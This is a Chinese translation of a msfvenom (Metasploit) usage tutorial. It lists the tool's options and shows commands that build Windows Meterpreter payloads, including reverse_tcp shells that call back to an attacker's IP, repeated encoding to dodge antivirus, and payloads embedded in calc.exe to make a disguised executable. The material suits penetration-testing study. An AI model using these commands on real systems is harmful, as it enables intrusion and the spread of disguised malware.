【译】Metasploit:如何使用 msfvenom



Msfvenom 在 2015 年 6 月 8 日已经替代了 msfpayload 与 msfenocde 命令,它是这两个命令的结合体。

为了开始使用 msfvenom,可以首先浏览一下它所支持的命令参数:

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads 
    # 指定特定的 Payload,如果被设置为 - ,那么从标准输入流中读取
        --payload-options            List the payload's standard options 
    # 列出指定 Payload 的标准可选配置项
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all 
    # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload 
    # 指定 nop 在 payload 中的数量(译者注:类似堆喷射中通过 nop 滑动到 payload)
    -f, --format        <format>     Output format (use --help-formats for a list) 
    # 指定 Payload 的输出格式
        --help-formats               List available formats 
    # 列出所有可用的输出格式
    -e, --encoder       <encoder>    The encoder to use 
    # 指定使用的 Encoder
    -a, --arch          <arch>       The architecture to use 
    # 指定目标系统架构
        --platform      <platform>   The platform of the payload 
    # 指定目标系统平台
        --help-platforms             List available platforms 
    # 列出可用的平台
    -s, --space         <length>     The maximum size of the resulting payload 
    # 设置未经编码的 Payload 的最大长度
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value) 
    # 编码后的 Payload 的最大长度
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff' 
    # 设置需要在 Payload 中避免出现的字符
    -i, --iterations    <count>      The number of times to encode the payload 
    # 设置 Payload 的编码次数
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include 
    # 指定包含一个额外的win32 shellcode文件
    -x, --template      <path>       Specify a custom executable file to use as a template 
    # 指定一个特定的可执行文件作为模板
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread 
    # 保护模板程序的功能,注入的payload作为一个新的进程运行
    -o, --out           <path>       Save the payload 
    # 保存 Payload 到文件
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats 
    # 指定一个变量名
    #(译者注:当添加 -f 参数的时候,例如 -f python,那么输出为 python 代码, payload 会被按行格式化为 python 代码
    # 追加到一个 python 变量中,这个参数即为指定 python 变量的变量名)
        --smallest                   Generate the smallest possible payload 
    # 尽可能生成最短的 Payload
    -h, --help                       Show this message 
    # 帮助

如何生成 Payload

为了生成 Payload,你需要配置两个必要的参数(-p 与 -f):

  • -p 参数指定特定的 Payload

可以通过如下命令列出所有可以使用的 Payload

./msfvenom -l payloads
  • -p 参数也支持使用 - 作为值来从标准输入中读取自定义的 Payload
cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw
  • -f 参数指定 Payload 的输出格式

例如:

./msfvenom -p windows/meterpreter/bind_tcp -f exe

可以通过如下命令来查看所有支持的格式

./msfvenom --help-formats

下面是一个典型的 msfvenom 的使用案例:

$ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe

如何对 Payload 进行编码

默认情况下,当你使用 -b 选项(badchar 选项)时,编码功能将自动启动。 在其他情况下,您必须使用-e选项来开启 Payload 编码功能,如下所示:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw

如下所示,使用 -l 参数可以列出所有可用的编码器(译者注:encoder)

./msfvenom -l encoders

你也可以通过添加 -i 参数来将一个 Payload 编码多次,有时候多次编码可以绕过防病毒软件的检测(译者注:俗称免杀)。
但是要知道的是:编码并不能真正作为免杀的解决方案

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 

避免使用某些字符(译者注:例如某些情况下 Payload 中是不可以出现 \x00 字符的)

-b 参数被设置的时候,它的值中描述的字符将会被避免出现在 Payload 中
当这个参数被添加的时候,msfvenom 将会自动寻找合适的编码器来编码 Payload

./msfvenom -p windows/meterpreter/bind_tcp -b '\x00' -f raw

如何提供一个自定义的模板

默认情况下,msfvenom 使用保存在目录 msf/data/templates 下的模板文件。如果你想要选择自己的模板,你可以使用 -x 参数来指定

./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe 

请注意:如果你想使用一个自定义的基于 64 位操作系统的模板,那么请将 -f 参数中的 exe 修改为 exe-only

./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe

-x 参数经常与 -k 参数成对出现,这样你就可以将模板中的 Payload 作为新线程运行。
但是,目前这仅适用于较老的Windows机器,如 x86 Windows XP。

如何将 msfvenom 的输出串联起来(利用操作系统管道的重定向特性)

以前旧的 msfpayloadmsfencode 经常串联使用,并按照多种编码顺序排列。msfvenom 也可以被这样使用:

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \
./msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | \
./msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe

参考文章(译者注)

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 156,630评论 4 359
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 66,405评论 1 289
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 106,382评论 0 237
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,548评论 0 203
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 51,853评论 3 285
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,276评论 1 209
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,638评论 2 309
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,350评论 0 195
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,015评论 1 238
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,309评论 2 240
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,836评论 1 256
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,206评论 2 251
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,767评论 3 231
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,972评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,715评论 0 192
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,319评论 2 269
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,222评论 2 258